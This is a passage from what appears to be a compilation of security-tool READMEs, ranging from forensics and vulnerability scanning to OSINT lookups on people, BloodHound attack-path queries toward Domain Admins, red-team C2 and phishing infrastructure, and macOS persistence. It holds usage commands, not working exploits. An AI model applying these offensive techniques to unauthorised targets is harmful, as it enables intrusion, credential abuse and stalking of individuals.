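digest = hashlib.md5(open(archive, "rb").read()).hexdigest()
with open(archive + ".md5", "w") as f:
    f.write(f"{digest}  {archive}\n")
```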


Examples

Run all collectors against the current running system and use the current directory as the destination. Extensions will not be run:

./uac -a

Run all collectors and all extensions against the current running system, and use /tmp as the destination directory:

./uac -a -e all /tmp

Run only hash_exec and chkrootkit extensions against the current running system, force linux profile and use /mnt/share as the destination directory:

./uac -e hash_exec,chkrootkit -P linux /mnt/share

Run only process, hardware and logs collectors against the current running system, force solaris profile, use /tmp as the destination directory, and increase verbosity level:

./uac -p -w -l -P solaris -V /tmp



Scylla - The Simplistic Information Gathering Engine | Find Advanced Information On A Username, Website, Phone Number, Etc...



Scylla is an OSINT tool developed in Python 3.6. Scylla lets users perform advanced searches on Instagram & Twitter accounts, websites/webservers, phone numbers, and names. Scylla also allows users to find all social media profiles (main platforms) assigned to a certain username. In addition, Scylla has Shodan support, so you can search for devices all over the internet, and it has in-depth geolocation capabilities. Lastly, Scylla has a finance section which allows users to check if a credit/debit card number has been leaked/pasted in a breach and returns information on the card's IIN/BIN. This is the first version of the tool, so please contact the developer if you want to help contribute and add more to Scylla.


Installation

1: git clone https://www.github.com/DoubleThreatSecurity/Scylla
2: cd Scylla
3: sudo python3 -m pip install -r requirments.txt
4: python3 scylla.py --help


Usage
  1. python3 scylla.py --instagram davesmith --twitter davesmith
    Command 1 will return account information of that specified Instagram & Twitter account.
  2. python3 scylla.py --username johndoe
    Command 2 will return all the social media (main platforms) profiles associated with that username.
  3. python3 scylla.py --username johndoe -l="john doe"
    Command 3 will repeat command 2 but instead it will also perform an in-depth google search for the "-l" argument. NOTE: When searching a query with spaces make sure you add the equal sign followed by the query in quotations. If your query does not have spaces, it will be as such: python3 scylla.py --username johndoe -l query
  4. python3 scylla.py --info google.com
    Command 4 will return crucial WHOIS information about the webserver/website.
  5. python3 scylla.py -r +14167777777
    Command 5 will dump information on that phone number (Carrier, Location, etc.)
  6. python3 scylla.py -s apache
    Command 6 will dump all the IP addresses of Apache servers that Shodan can grab based on your API key. The query can be anything that Shodan can validate.
    A sample API key is given. I recommend reading the API NOTICE below for more information.
  7. python3 scylla.py -s webcamxp
    Command 7 will dump all the IP addresses and ports of open webcams on the internet that Shodan can grab based on your API key. You can also just use the webcam query, but webcamxp returns better results.
    A sample API key is given. I recommend reading the API NOTICE below for more information.
  8. python3 scylla.py -g 1.1.1.1
    Command 8 will geolocate the specified IP address. It will return the longitude & latitude, city, state/province, country, zip/postal code, region and district.
  9. python3 scylla.py -c 123456789123456
    Command 9 will retrieve information on the IIN of the credit/debit card number entered. It will also check if the card number has been leaked/pasted in a breach. Scylla will return the card brand, card scheme, card type, currency, country, and information on the bank of that IIN. NOTE: Enter the full card number if you would like to see whether it was leaked. If you just want data on the first 6-8 digits (a.k.a. the BIN/IIN), just input the first 6, 7 or 8 digits of the credit/debit card number. Lastly, all the information generated is public because this is an OSINT tool, and no revealing details can be generated. This prevents malicious use of this option.
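As the note above says, the IIN/BIN is simply the leading 6-8 digits of the card number. A minimal sketch of that extraction (an illustration, not Scylla's actual code):

```python
# Extract the IIN/BIN: strip non-digits, then take the leading 6-8 digits.
def iin_of(card_number, length=6):
    digits = "".join(ch for ch in card_number if ch.isdigit())
    return digits[:length]

print(iin_of("4111 1111 1111 1111"))     # '411111'
print(iin_of("4111111111111111", 8))     # '41111111'
```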

Menu
usage: scylla.py [-h] [-v] [-ig INSTAGRAM] [-tw TWITTER] [-u USERNAME]
[--info INFO] [-r REVERSE_PHONE_LOOKUP] [-l LOOKUP]
[-s SHODAN_QUERY] [-g GEO] [-c CARD_INFO]

optional arguments:
-h, --help show this help message and exit
-v, --version returns scylla's version
-ig INSTAGRAM, --instagram INSTAGRAM
return the information associated with specified
instagram account
-tw TWITTER, --twitter TWITTER
return the information associated with specified
twitter account
-u USERNAME, --username USERNAME
find social media profiles (main platforms) associated
with given username
--info INFO return information about the specified website(WHOIS)
w/ geolocation
-r REVERSE_PHONE_LOOKUP, --reverse_phone_lookup REVERSE_PHONE_LOOKUP
return information about the specified phone number
(reverse lookup)
-l LOOKUP, --lookup LOOKUP
performs a google search of the 35 top items for the
argument given
-s SHODAN_QUERY, --shodan_query SHODAN_QUERY
performs an in-depth shodan search on any simple
query (i.e, 'webcamxp', 'voip', 'printer', 'apache')
-g GEO, --geo GEO geolocates a given IP address. provides: longitude,
latitude, city, country, zipcode, district, etc.
-c CARD_INFO, --card_info CARD_INFO
check if the credit/debit card number has been pasted
in a breach...dumps sites. Also returns bank
information on the IIN

API NOTICE

The API used for the reverse phone number lookup (free package) has a maximum of 250 requests. The key used in the program right now will most definitely run out of uses in the near future. If you want to keep generating API keys, go to https://www.numverify.com and select the free plan after creating an account. Then simply open scylla.py and replace the original API key with your new API key, found in your account dashboard. Insert your new key into the keys[] array (at the top of the source). For the Shodan API key, it is just a sample key given to the program. The developer recommends creating a Shodan account and adding your own API key to the shodan_api[] array at the top of the source (scylla.py).
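The keys[] rotation idea described above can be sketched like this; the key values and the try_request helper are hypothetical and not Scylla's actual source:

```python
# Walk the keys[] array and use the first key the API accepts.
keys = ["key-one", "key-two", "key-three"]   # hypothetical NumVerify keys

def try_request(key):
    # Placeholder: a real implementation would call the numverify API here
    # and return True when the request is not rejected for quota/auth.
    return key == "key-three"

result = next((k for k in keys if try_request(k)), None)
print(result)  # 'key-three'
```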


Discord Server

https://discord.gg/jtZeWek


Ethical Notice

The developer of this program, Josh Schiavone, wrote the following code for educational and OSINT purposes only. The information generated is not to be used in a way to harm, stalk or threaten others. Josh Schiavone is not responsible for misuse of this program. May God bless you all.



Burpsuite-Copy-As-XMLHttpRequest - Copy As XMLHttpRequest BurpSuite Extension



The extension adds a context menu to BurpSuite that allows you to copy multiple requests as Javascript's XmlHttpRequest, which simplifies PoC development when exploiting XSS.


Installation
  • download the latest JAR from releases or build manually
  • add JAR to burpsuite using tabs: "Extender" -> "Extensions" -> "Add"

Usage
  • select one request from any tab or a few requests in "Proxy" -> "HTTP history" tab
  • invoke context menu and select "Copy as XMLHttpRequest"


ThreatMapper - Identify Vulnerabilities In Running Containers, Images, Hosts And Repositories


The Deepfence Runtime Threat Mapper is a subset of the Deepfence cloud native workload protection platform, released as a community edition. This community edition empowers users with the following features:

  1. Visualization: Visualize kubernetes clusters, virtual machines, containers and images, running processes, and network connections in near real time.

  2. Runtime Vulnerability Management: Perform vulnerability scans on running containers & hosts as well as container images.

  3. Container Registry Scanning: Check for vulnerabilities in images stored on AWS ECR, Azure Container Registry, Google Container Registry, Docker Hub, Docker Self-Hosted Private Registry, Quay, Harbor, Gitlab and JFrog registries.

  4. CI/CD Scanning: Scan images as part of existing CI/CD Pipelines like CircleCI, Jenkins & GitLab.

  5. Integrations with SIEM, Notification Channels & Ticketing: Ready to use integrations with Slack, PagerDuty, HTTP endpoint, Jira, Splunk, ELK, Sumo Logic and Amazon S3.


Live Demo

https://deepfence.io/community-demo-form/


Architecture

A pictorial depiction of the Deepfence Architecture is below




Feature Availability
Feature | Runtime Threat Mapper (Community Edition) | Workload Protection Platform (Enterprise Edition)
Discover & Visualize Running Pods, Containers and Hosts | ✔️ (unlimited) | ✔️ (unlimited)
Runtime Vulnerability Management for hosts/VMs | ✔️ (unlimited) | ✔️ (unlimited)
Runtime Vulnerability Management for containers | ✔️ (unlimited) | ✔️ (unlimited)
Container Registry Scanning | ✔️ | ✔️
CI/CD Integration | ✔️ | ✔️
Multiple Clusters | ✔️ | ✔️
Integrations with SIEMs, Slack and more | ✔️ | ✔️
Compliance Automation | - | ✔️
Deep Packet Inspection of Encrypted & Plain Traffic | - | ✔️
API Inspection | - | ✔️
Runtime Integrity Monitoring | - | ✔️
Network Connection & Resource Access Anomaly Detection | - | ✔️
Workload Firewall for Containers, Pods and Hosts | - | ✔️
Quarantine & Network Protection Policies | - | ✔️
Alert Correlation | - | ✔️
Serverless Protection | - | ✔️
Windows Protection | - | ✔️
Highly Available & Multi-node Deployment | - | ✔️
Multi-tenancy & User Management | - | ✔️
Enterprise Support | - | ✔️

Getting Started

The Deepfence Management Console is first installed on a separate system. The Deepfence agents are then installed onto bare-metal servers, Virtual Machines, or Kubernetes clusters where the application workloads are deployed, so that the host systems, or the application workloads, can be scanned for vulnerabilities.

A pictorial depiction of the Deepfence security platform is as follows:



Deepfence Management Console

Pre-Requisites for Management Console
Feature | Requirement
CPU (number of cores) | 4
RAM | 16 GB
Disk space | At least 120 GB
Port range to be opened for receiving data from Deepfence agents | 8000-8010
Port to be opened for web browsers to communicate with the Management Console UI | 443
Docker binaries | At least version 18.03
Docker-compose binary | Version 1.20.1

The following table gives the number of nodes that can be supported with different console machine configurations, assuming a single-node deployment of the console. Memory-optimised instances perform better.

CPU | RAM | Nodes supported
4 cores | 16 GB | 250 nodes
8 cores | 16 GB | 500 nodes
8 cores | 32 GB | 1000 nodes
16 cores | 32 GB | 1400-1500 nodes

To support a higher number of nodes (i.e. hosts; the number of containers is theoretically unlimited, depending on their lifetimes), ThreatMapper needs to be deployed as a 3-node Kubernetes cluster, which scales up to 10000 nodes. Instructions to follow.


Installation of Deepfence Management Console

Installing the Management Console is as easy as:

  1. Download the file docker-compose.yml to the desired system.
  2. Execute the following command
    docker-compose -f docker-compose.yml up -d
  3. Open management console ip address / domain in the browser (https://x.x.x.x) and register a new account. Steps: Register a User
  4. Get the Deepfence API key from the UI: go to Settings -> User Management and copy the API key. In the following docker run command, replace C8TtyEtNB0gBo1wGhpeAZICNSAaGWw71BSdS2kLELY0 with the API key. Steps: Deepfence API Key
    docker run -dit --cpus=".2" --name=deepfence-agent --restart on-failure --pid=host --net=host --privileged=true -v /sys/kernel/debug:/sys/kernel/debug:rw -v /var/log/fenced -v /var/run/docker.sock:/var/run/docker.sock -v /:/fenced/mnt/host/:ro -e USER_DEFINED_TAGS="" -e DF_BACKEND_IP="127.0.0.1" -e DEEPFENCE_KEY="C8TtyEtNB0gBo1wGhpeAZICNSAaGWw71BSdS2kLELY0" deepfenceio/deepfence_agent_ce:latest

This is the minimal installation required to quickly get started on scanning various container images. The necessary images may now be downloaded onto this Management Console and scanned for vulnerabilities.


Terraform

Installation with custom TLS certificates

Custom TLS certificates are supported for the web application hosted on the console machine. Users have to place the certificate and private key in the /etc/deepfence/certs folder on the console machine. Deepfence looks for files with .key and .crt extensions at the specified location on the host.
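That lookup can be pictured as a simple glob over the certs folder; the sketch below uses a temporary directory in place of /etc/deepfence/certs and is only an illustration of the convention, not Deepfence's code:

```python
# Find one certificate (.crt) and one private key (.key) in a certs folder.
import glob
import os
import tempfile

certs_dir = tempfile.mkdtemp()  # stand-in for /etc/deepfence/certs
for name in ("console.crt", "console.key"):  # hypothetical file names
    open(os.path.join(certs_dir, name), "w").close()

crt = glob.glob(os.path.join(certs_dir, "*.crt"))
key = glob.glob(os.path.join(certs_dir, "*.key"))
print(len(crt), len(key))  # 1 1
```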


Deepfence Agent

The Deepfence agent needs to be installed on a host in order to check it for vulnerabilities, and on any other hosts where docker images or containers that have to be checked for vulnerabilities are stored.


Pre-Requisites for Deepfence Agent
Feature | Requirement
CPU (number of cores) | 2
RAM | 1 GB
Disk space | At least 30 GB
Connectivity | The host on which the Deepfence agent is installed must be able to communicate with the Management Console on port range 8000-8010.
Linux kernel version | >= 4.4
Docker binaries | At least version 18.03
Deepfence Management Console | Installed on a host with IP address x.x.x.x

Installation of Deepfence Agent

Installation procedure for the Deepfence agent depends on the environment that is being used. Instructions for installing Deepfence agent on some of the common platforms are given in detail below:


Deepfence Agent on Standalone VM or Host

Installing the Deepfence Agent is now as easy as:

  1. Get the Deepfence API key from the UI: go to Settings -> User Management and copy the API key
  2. In the following docker run command, replace x.x.x.x with the IP address of the Management Console and replace C8TtyEtNB0gBo1wGhpeAZICNSAaGWw71BSdS2kLELY0 with the API key
    docker run -dit --cpus=".2" --name=deepfence-agent --restart on-failure --pid=host --net=host --privileged=true -v /sys/kernel/debug:/sys/kernel/debug:rw -v /var/log/fenced -v /var/run/docker.sock:/var/run/docker.sock -v /:/fenced/mnt/host/:ro -e USER_DEFINED_TAGS="" -e DF_BACKEND_IP="x.x.x.x" -e DEEPFENCE_KEY="C8TtyEtNB0gBo1wGhpeAZICNSAaGWw71BSdS2kLELY0" deepfenceio/deepfence_agent_ce:latest
  3. Optionally the agent node can be tagged using USER_DEFINED_TAGS="" in the above command. Tags should be comma separated. Example: "dev,front-end"

Deepfence Agent on Amazon ECS

For detailed instructions to deploy agents on Amazon ECS, please refer to our Amazon ECS wiki page.


Deepfence Agent Helm chart for Kubernetes
  • Start deepfence agent (replace x.x.x.x with the IP address of the Management Console and C8TtyEtNB0gBo1wGhpeAZICNSAaGWw71BSdS2kLELY0 with api key)
# helm v2
helm install --repo https://deepfence.github.io/ThreatMapper/files/helm-chart deepfence-agent \
--name=deepfence-agent \
--set managementConsoleIp=x.x.x.x \
--set deepfenceKey=C8TtyEtNB0gBo1wGhpeAZICNSAaGWw71BSdS2kLELY0
# helm v3
helm install deepfence-agent --repo https://deepfence.github.io/ThreatMapper/files/helm-chart deepfence-agent \
--set managementConsoleIp=x.x.x.x \
--set deepfenceKey=C8TtyEtNB0gBo1wGhpeAZICNSAaGWw71BSdS2kLELY0
  • Delete deepfence agent
# helm v2
helm delete --purge deepfence-agent
# helm v3
helm delete deepfence-agent

Deepfence Agent on Google GKE

For detailed instructions to deploy agents on Google GKE, please refer to our Google GKE wiki page.


Deepfence Agent on Azure AKS

For detailed instructions to deploy agents on Azure Kubernetes Service, please refer to our Azure AKS wiki page.


Deepfence Agent on self-managed / on-premise Kubernetes

For detailed instructions to deploy agents on a Kubernetes cluster, please refer to our Self-managed/On-premise Kubernetes wiki page.



Columbo - A Computer Forensic Analysis Tool Used To Simplify And Identify Specific Patterns In Compromised Datasets



Columbo is a computer forensic analysis tool used to simplify and identify specific patterns in compromised datasets. It breaks data down into small sections and uses pattern recognition and machine learning models to identify adversaries' behaviour and their possible locations on compromised Windows platforms, in the form of suggestions. Currently, Columbo operates on the Windows platform.


Dependencies & High Level Architecture

Columbo depends on volatility 3, autorunsc.exe and sigcheck.exe to extract data. Therefore users must download these dependent tools and place them under the \Columbo\bin folder. Please make sure you read and understand the license section (or the License.txt file) before you download anything. The output (data) generated by these tools is automatically piped to Columbo's main engine, which breaks it down into small sections, pre-processes it, and applies machine learning models to classify the location of the compromised system, executable files and other behaviours.


Get started with Columbo

Videos

  1. Before you start Columbo Watch
  2. Memory forensics using Columbo Memory-forensics

Installation and Configuration

Executable -Binary

  1. Download and install python 3.7 or 3.8 (not tested with 3.9). Make sure you add python.exe to the PATH during the installation.
  2. Download latest binary Columbo release, under Releases
  3. Download each of the following and place them under \Columbo\bin.
  • Volatility 3 source code. Columbo does not support Volatility 2. Please make sure you also download Symbol table packs for windows, unzip it and put it under \Columbo\bin\volatility3-master\volatility\symbols.
  • Download both autorunsc.exe and sigcheck.exe

NB: To avoid errors, the directory structure must be \Columbo\bin\volatility3-master, \Columbo\bin\autorunsc.exe and \Columbo\bin\sigcheck.exe

Finally double click on "main.exe" under \Columbo.

Source Code

  1. Download and install python 3.7 or 3.8 (not tested with 3.9). Make sure you add python.exe to the PATH during the installation.
  2. Download the latest release version of Columbo - source code.
  3. Double click on install-prerequisites.bat to install all the required packages.
  4. Download each of the following and place them under \Columbo\bin.
  • Volatility 3 source code. Columbo does not support Volatility 2. Please make sure you also download Symbol table packs for windows, unzip it and put it under \Columbo\bin\volatility3-master\volatility\symbols
  • Download both autorunsc.exe and sigcheck.exe.

NB: To avoid errors, the directory structure must be \Columbo\bin\volatility3-master, \Columbo\bin\autorunsc.exe and \Columbo\bin\sigcheck.exe

Finally go to cmd and issue python.exe \Columbo\main.py


Columbo and Machine Learning

Columbo uses data preprocessing to organise the data and machine learning models to identify suspicious behaviours. Its outputs are either 1 (suspicious) or 0 (genuine), in the form of suggestions, purely to assist digital forensic examiners in their decision making. We have trained the models with different examples to maximise accuracy and used different approaches to minimise false positives. However, false positives (false detections) are still experienced, and therefore we are committed to updating the models periodically.


False Positive

It's not easy to reduce false positives (false detections), especially when dealing with machine learning. The output generated by machine learning models might be a false positive depending on the quality of the data used to train the models. However, to assist forensic examiners in their investigation, Columbo generates percentage scores for each 1 (suspicious) and 0 (genuine). Such an approach helps examiners pick and choose the paths, commands or processes that Columbo classifies as suspicious.
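The percentage-score idea can be sketched as follows; the threshold and probability values are illustrative, not Columbo's actual model output:

```python
# Turn a model probability into a 1/0 label plus a percentage score.
def score(probability_suspicious):
    label = 1 if probability_suspicious >= 0.5 else 0
    return label, round(probability_suspicious * 100, 1)

print(score(0.87))  # (1, 87.0)
print(score(0.12))  # (0, 12.0)
```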


Options to Select

Option 2

Live analysis: files and process traceability. This option analyses running Windows processes to identify malicious activities, if any. Columbo uses autorunsc.exe to extract data from the machine; the outputs are piped to machine learning models and pattern recognition engines to classify suspicious activities. The outputs are then saved under \Columbo\ML\Step-2-results in the form of Excel files for further analysis. Furthermore, users are given options to examine running processes. The result contains information such as process traceability, the commands associated with each process (if applicable), and whether or not the processes are responsible for executing new processes.

Option 3

Scan and analyse a Hard Disk Image File (.vhdx): This option takes the path of a mounted Windows Hard Disk Image. It uses sigcheck.exe to extract data from the file systems. The results are then piped into machine learning models to classify suspicious activities, and the outputs are saved under \Columbo\ML\Step-3-results in the form of Excel files.

Option 4

Memory Forensics. In this option, Columbo takes the path of the memory image, and the following options are presented for users to select.

  1. Memory Information: Volatility 3 is used to extract information about the image.

  2. Processes Scan: Volatility 3 is used to extract process, dll and handle information for each process. Then, Columbo uses grouping and clustering mechanisms to group each process according to its mother process. This option is later used by process traceability under the Anomaly Detection option.

  3. Process Tree: Volatility 3 is used to extract the process tree.

  4. Anomaly Detection and Process Traceability: Volatility 3 is used to extract a list of processes flagged by anomaly detection. In addition, Columbo offers an option called Process Traceability to separately examine each process, and collectively produces the following information.

  • Paths of the executable files and associated commands.
  • Using Machine Learning models to determine the legitimacy of the identified processes.
  • Trace each process all the way back to their root processes (complete path) and their execution dates and time.
  • Identify if the process is responsible for executing other processes i.e. is it going to be a mother process of new processes or not.
  • It extracts handle and dll information for each process and presents it with the rest of the information.
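The grouping step in the Processes Scan option can be sketched as grouping processes under their parent ("mother") process; the sample records below are made up and are not real Volatility 3 output:

```python
# Group process names under the PID of their parent process.
from collections import defaultdict

procs = [  # hypothetical process records
    {"pid": 4, "ppid": 0, "name": "System"},
    {"pid": 400, "ppid": 4, "name": "smss.exe"},
    {"pid": 500, "ppid": 400, "name": "csrss.exe"},
]

by_parent = defaultdict(list)
for p in procs:
    by_parent[p["ppid"]].append(p["name"])

print(dict(by_parent))  # {0: ['System'], 4: ['smss.exe'], 400: ['csrss.exe']}
```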


    NtHiM - Super Fast Sub-domain Takeover Detection





    Installation

    Method 1: Using Pre-compiled Binaries

    The pre-compiled binaries for different systems are available in the Releases page. You can download the one suitable for your system, unzip the file and start using NtHiM.


    Method 2: Using Crates.io

    NtHiM is available on Crates.io. So, if you have Rust installed on your system, you can simply install NtHiM with the following command:

    cargo install NtHiM

    Method 3: Manual Build

    You will need Cargo to perform the manual build for NtHiM. If you have Cargo installed, you can simply follow the steps below:

    1. Clone this repository, git clone https://github.com/TheBinitGhimire/NtHiM;
    2. Go inside the folder, cd NtHiM;
    3. Use the cargo build command,
    4. Go inside the newly-created target folder, and open the debug folder inside it, cd target/debug;
    5. You will find NtHiM.exe (on Microsoft Windows) or the NtHiM binary (on Linux).

    The installation walkthrough for NtHiM has been uploaded to YouTube, covering all of these three methods, and you can watch the video here: How to Install and Use NtHiM (Now, the Host is Mine!)? Super Fast Sub-domain Takeover Detection!


    Usage
    Flag | Description | Example
    -h | Display help related to usage! | NtHiM -h
    -t | Scan a single target! | NtHiM -t https://example.example.com
    -f | Scan a list of targets from a file! | NtHiM -f hostnames.txt
    -c | Number of concurrent threads! | NtHiM -c 100 -f hostnames.txt
    -V | Display the version information! | NtHiM -V

    Use Case 1 (Single Target):
    NtHiM -t https://example.example.com

    Use Case 2 (Multiple Targets):
    NtHiM -f hostnames.txt
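    The -c flag's concurrency can be sketched with a thread pool; check() below is a stand-in for NtHiM's real takeover probe, and the hostnames are examples:

```python
# Check many hostnames concurrently, mirroring the -c thread-count idea.
from concurrent.futures import ThreadPoolExecutor

hostnames = ["a.example.com", "b.example.com", "c.example.com"]

def check(host):
    # Placeholder probe: a real check would resolve the CNAME and match
    # the response against known takeover fingerprints.
    return host, False

with ThreadPoolExecutor(max_workers=100) as pool:
    results = dict(pool.map(check, hostnames))

print(results)
```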

    Usage Demonstration:



    Examples

    Single Target



    Multiple Targets using Concurrent Threads



    Workflow

    Platform Identification

    NtHiM uses the data provided in EdOverflow/can-i-take-over-xyz for the platform identification.
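    Fingerprint-based identification can be sketched as matching a target's CNAME and response body against a fingerprint list; the two sample entries below are illustrative, and the real data lives in EdOverflow/can-i-take-over-xyz:

```python
# Match a CNAME suffix plus a response-body fingerprint to a service.
fingerprints = [  # sample entries, not the full can-i-take-over-xyz list
    {"service": "GitHub Pages", "cname": "github.io",
     "fingerprint": "There isn't a GitHub Pages site here"},
    {"service": "Heroku", "cname": "herokuapp.com",
     "fingerprint": "No such app"},
]

def identify(cname, body):
    for fp in fingerprints:
        if cname.endswith(fp["cname"]) and fp["fingerprint"] in body:
            return fp["service"]
    return None

print(identify("demo.github.io", "There isn't a GitHub Pages site here"))
```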


    Frequently Asked Questions (FAQs)

    If you have any questions regarding NtHiM, please raise an issue by going to the Issues page.

    Some of your queries might have been answered in one of the existing issues, so please make sure to check the Issues with the FAQ label before raising an issue on your own.


    Contributions and Feature Requests

    If you are interested in contributing in the development of NtHiM, you can feel free to create a Pull Request with modifications in the original code, or you shall open up a new issue, and I will try to include the feature as requested.

    There is no restriction on anyone for contributing to the development of NtHiM. If you would like to contribute, you can feel free to do so.



    Max - Maximizing BloodHound



    Maximizing BloodHound.

    Description

    New Release:

    • dpat - The BloodHound Domain Password Audit Tool (DPAT)

    A simple suite of tools:

    • get-info - Pull lists of information from the Neo4j database
    • mark-owned - Mark a list of objects as Owned
    • mark-hvt - Mark a list of objects as High Value Targets
    • query - Run a raw Cypher query and return output
    • export - Export all outbound controlling privileges of a domain object to a CSV file
    • del-edge - Delete an edge from the database
    • add-spns - Create HasSPNConfigured relationships, new attack primitive
    • add-spw - Create SharesPasswordWith relationships
    • dpat - The BloodHound Domain Password Audit Tool (DPAT)
    • pet-max - Dogsay, happiness for stressful engagements

    This was released with screenshots & use-cases on the following blogs: Max Release, Updates & Primitives, and DPAT

    A new potential attack primitive was added to this tool during my research, see the add-spns section for full details.


    Usage

    Installation

    Ideally there shouldn't be much to install, but I've included a requirements.txt file just in case. Tested on Kali Linux & Windows 10; all functionality should work on both Linux and Windows operating systems.

    pip3 install -r requirements.txt


    Neo4j Creds

    Neo4j credentials can be hardcoded at the beginning of the script OR provided on the CLI. If both areas are left blank, you will be prompted for the username/password.

    python3 max.py -u neo4j -p neo4j {module} {args}
    python3 max.py {module} {args}
    Neo4j Username: neo4j
    Neo4j Password:
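    The fallback order above (hardcoded values first, then CLI arguments, then an interactive prompt) can be sketched as follows; the names are illustrative, not Max's actual variables:

```python
# First non-empty source wins: hardcoded -> CLI -> interactive prompt.
def resolve_creds(hardcoded, cli, prompt):
    return hardcoded or cli or prompt()

# Hardcoded slot empty, CLI supplied: the CLI pair is used, prompt is skipped.
creds = resolve_creds(None, ("neo4j", "neo4j"), lambda: ("asked", "asked"))
print(creds)  # ('neo4j', 'neo4j')
```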

    Quick Use

    Getting help in general, and module specific

    python3 max.py -h
    python3 max.py {module} -h

    Importing owned objects into BH

    python3 max.py mark-owned -f owned.txt
    python3 max.py mark-owned -f owned.txt --add-note "Owned by repeated local admin"

    Get list of users

    python3 max.py get-info --users
    python3 max.py get-info --users --enabled

    USER01@DOMAIN.LOCAL
    USER02@DOMAIN.LOCAL
    ...

    Get list of objects in a target group

    python3 max.py get-info --group-members "domain controllers@domain.local"

    Get a list of computers that a user has administrative rights to

    python3 max.py get-info --adminto USER01@DOMAIN.LOCAL

    Get a list of owned objects with the notes for each

    python3 max.py get-info --owned --get-note

    Running a query - return a list of all users with a path to DA

    python3 max.py query -q "MATCH (n:User),(m:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'}) MATCH (n)-[*1..]->(m) RETURN DISTINCT(n.name)"

    Delete an edge from the database

    python3 max.py del-edge CanRDP

    Add HasSPNConfigured relationship using the information stored within BloodHound, or with a GetUserSPNs impacket file

    python3 max.py add-spns -b
    python3 max.py add-spns -i getuserspns-raw-output.txt

    DPAT

    python3 max.py dpat -n ~/client/ntds.dit -p ~/.hashcat/hashcat.potfile -o outputdir --html --sanitize

    Pet max

    python3 max.py pet-max

    Object Files & Specification

    Objects in file, must contain FQDN within, capitalization does not matter. This also applies to whenever a CLI username/computer name is supplied.

    user01@domain.local      <- will be added / correct CLI input
    group01@domain.local <- will be added / correct CLI input
    computer01.domain.local <- will be added / correct CLI input
    ComPutEr01.doMAIn.LOcaL <- will be added / correct CLI input
    user02 <- will not be added / incorrect CLI input
    computer02 <- will not be added / incorrect CLI input
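    The rule above (entries must contain an FQDN; capitalization is ignored) can be checked with a small sketch; this is an illustration, not Max's actual validation code:

```python
# An entry qualifies when the part after any '@' contains a dotted domain.
def will_be_added(entry):
    entry = entry.strip().lower()
    return "." in entry.split("@")[-1]

print(will_be_added("user01@domain.local"))       # True
print(will_be_added("computer01.domain.local"))   # True
print(will_be_added("user02"))                    # False
```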

    Further work

    I hope to include an analyze function to provide functionality similar to PlumHound/Cypheroth. Lastly, I'm thinking about creating a PowerShell version for those running Neo4j on Windows, but I'm trash at PowerShell, so TBD.

    Any other features and improvements welcome, find me @knavesec in the BloodHoundGang Slack channel and on Twitter


    Contributors

    I'd like to especially thank those who have contributed their time to developing & improving this tool:



    Redcloud - Automated Red Team Infrastructure Deployment Using Docker



    Redcloud is a powerful and user-friendly toolbox for deploying a fully featured Red Team Infrastructure using Docker. Harness the cloud's speed for your tools. Deploys in minutes. Use and manage it with its polished web interface.

    Ideal for your penetration tests, shooting ranges, red teaming and bug bounties!

    Self-host your attack infrastructure painlessly, deploy your very own live, scalable and resilient offensive infrastructure in a matter of minutes.


    Demo


    The following demo showcases deployment of Redcloud through ssh, followed by Metasploit. We then look at Traefik and a live volume attached to Metasploit. Finally, we check that Metasploit's DB is functional with the web terminal, delete the container, and terminate Redcloud.


    Features
    • Deploy Redcloud locally or remotely using the built-in SSH functions, and even docker-machine.
    • Deploy Metasploit, Empire, GoPhish, vulnerable targets, a fully stacked Kali, and many more with a few clicks.
    • Monitor and manage your infrastructure with a beautiful web interface.
    • Deploy redirections, socks or Tor proxy for all your tools.
    • Painless network management and volume sharing.
    • User and password management.
    • Web terminal
    • Overall very comfy

    Quick Start

    Setup:

    # If deploying using ssh
    > cat ~/.ssh/id_rsa.pub | ssh root@your-deploy-target-ip 'cat >> .ssh/authorized_keys'

    # If deploying using docker-machine, and using a machine named "default"
    > eval (docker-machine env default)

    # Check your Python version
    # Use python3 if default python version is 2.x
    > python --version

    Deploy:

    > git clone https://github.com/khast3x/redcloud.git
    > cd redcloud
    > python redcloud.py

    Redcloud uses PyYAML to print the list of available templates. It's installed by default on most systems.
    If not, simply run:

    # Use pip3 if default python version is 2.x
    > pip install -r requirements.txt

    Redcloud has 3 different deployment methods:

    1. Locally
    2. Remotely, using ssh. Requires having your public key in your target's authorized_keys file.
    3. Remotely, using docker-machine. Run the eval (docker-machine env deploy_target) line to preload your env with your docker-machine, and run redcloud.py. Redcloud should automatically detect your docker-machine, and highlight menu items relevant to a docker-machine deployment.

    Templates


    Briefly,

    redcloud.py deploys a Portainer stack preloaded with many tool templates for your offensive engagements, powered by Docker. Once deployed, control Redcloud with the web interface. It uses Traefik as a reverse proxy, and deploys easily to a remote target server using the system ssh or docker-machine.

    • Ever wanted to spin up a Kali in a cloud with just a few clicks?
    • Have clean silos between your tools, techniques and stages?
    • Monitor the health of your scans and C2?
    • Skip those sysadmin tasks for setting up a phishing campaign and get pwning faster?
    • Curious how you would build the ideal attack infrastructure?

    Use the web UI to monitor, manage, and interact with each container. Use the snappy web terminal just as you would with yours. Create volumes, networks and port forwards using Portainer's simple UI.

    Deploy and handle all your favorite tools and techniques with the power of data-center-grade internet.


    Screenshots
    • Deploying a container

     

    • Using Metasploit's msfconsole through the web interface

     

    • Traefik real-time data on reverse-proxy routes


    • Deploying using ssh




    PoisonApple - macOS Persistence Tool



    Command-line tool to perform various persistence mechanism techniques on macOS. This tool was designed to be used by threat hunters for cyber threat emulation purposes.


    Install

    Do it up:

    $ pip3 install poisonapple --user

    Note: PoisonApple was written and tested using Python 3.9; it should work with Python 3.6+


    Important Notes!
    • PoisonApple will make modifications to your macOS system; it's advised to only use PoisonApple on a virtual machine. Although any persistence mechanism technique added using this tool can also be easily removed (-r), please use with caution!
    • Be advised: This tool will likely cause common AV / EDR / other macOS security products to generate alerts.
    • To understand how any of these techniques work in-depth please see The Art of Mac Malware, Volume 1: Analysis - Chapter 0x2: Persistence by Patrick Wardle of Objective-See. It's a fantastic resource.

    Usage

    See PoisonApple switch options (--help):

    $ poisonapple --help
    usage: poisonapple [-h] [-l] [-t TECHNIQUE] [-n NAME] [-c COMMAND] [-r]

    Command-line tool to perform various persistence mechanism techniques on macOS.

    optional arguments:
    -h, --help show this help message and exit
    -l, --list list available persistence mechanism techniques
    -t TECHNIQUE, --technique TECHNIQUE
    persistence mechanism technique to use
    -n NAME, --name NAME name for the file or label used for persistence
    -c COMMAND, --command COMMAND
    command(s) to execute for persistence
    -r, --remove remove persistence mechanism

    List of available techniques:

    $ poisonapple --list
    , _______ __
    .-.:|.-. | _ .-----|__|-----.-----.-----.
